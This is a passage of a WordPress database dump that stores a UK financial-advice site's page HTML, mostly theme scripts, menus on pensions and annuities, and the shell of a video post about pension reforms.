type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/></body>','&#13;	How Annuities Have Changed Since The Budget','This article looks at the changes to annuities and how they will affect you, so the first thing to do is to explain specifically how they have changed.','inherit','closed','closed','','41-revision-v1','','','2017-09-21 17:35:59','2017-09-21 17:35:59','',41,'http://www.equalitywalk.org.uk/41-revision-v1',0,'revision','',0),(329,1,'2017-09-21 17:36:37','2017-09-21 17:36:37','<body class=\"single single-post postid-8701 single-format-video light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor current-menu-parent menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post current-menu-item menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Pension Reforms Offer Freedom to Savers										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/pensions/\" title=\"Pensions\">Pensions</a></li><li><a href=\"../category/video-2/\" title=\"Video\">Video</a></li><li>Pension Reforms Offer Freedom to Savers</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		&#13;\n										<div id=\"post-8701\" class=\"post-8701 post type-post status-publish format-video hentry category-pensions category-video-2 tag-video post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">Pension Reforms Offer Freedom to Savers</span>&#13;\n						<div class=\"post-content\">&#13;\n				<p><iframe class=\"wistia_embed\" src=\"http://fast.wistia.net/embed/iframe/9ybpbjuu4b\" name=\"wistia_embed\" width=\"640\" height=\"388\" frameborder=\"0\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"/></p>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Investor London</a></span><span class=\"sep\">|</span>Categories: <a href=\"../category/pensions/\" title=\"View all posts in Pensions\" rel=\"category tag\">Pensions</a>, <a href=\"../category/video-2/\" title=\"View all posts in Video\" rel=\"category tag\">Video</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: <a href=\"../tag/video/\" rel=\"tag\">video</a></span><span class=\"sep\">|</span><span>Comments Off</span>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/pension-reforms-offer-freedom-savers/&amp;p[title]=Pension%20Reforms%20Offer%20Freedom%20to%20Savers\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=Pension+Reforms+Offer+Freedom+to+Savers%20http://www.equalitywalk.org.uk/pension-reforms-offer-freedom-savers/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/pension-reforms-offer-freedom-savers/&amp;title=Pension%20Reforms%20Offer%20Freedom%20to%20Savers\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/pension-reforms-offer-freedom-savers/&amp;title=Pension%20Reforms%20Offer%20Freedom%20to%20Savers\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fpension-reforms-offer-freedom-savers%2F&amp;name=Pension+Reforms+Offer+Freedom+to+Savers&amp;description=\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/pension-reforms-offer-freedom-savers/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"http://pinterest.com/pin/create/button/?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fpension-reforms-offer-freedom-savers%2F&amp;description=Pension+Reforms+Offer+Freedom+to+Savers&amp;media=\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=Pension Reforms Offer Freedom to Savers&amp;body=http://www.equalitywalk.org.uk/pension-reforms-offer-freedom-savers/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Investor London</a></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\">&#13;\n											</div>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are closed. -->&#13;\n		<p class=\"no-comments\">Comments are closed.</p>&#13;\n&#13;\n	&#13;\n&#13;\n								</div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../whole-life-advisers-tale/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../whole-life-advisers-tale/\">Whole of life insurance – an advisers tale</a>&#13;\n									<div class=\"meta\">&#13;\n										May 22nd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n									<div class=\"meta\">&#13;\n										May 14th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (4)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (8)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (16)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				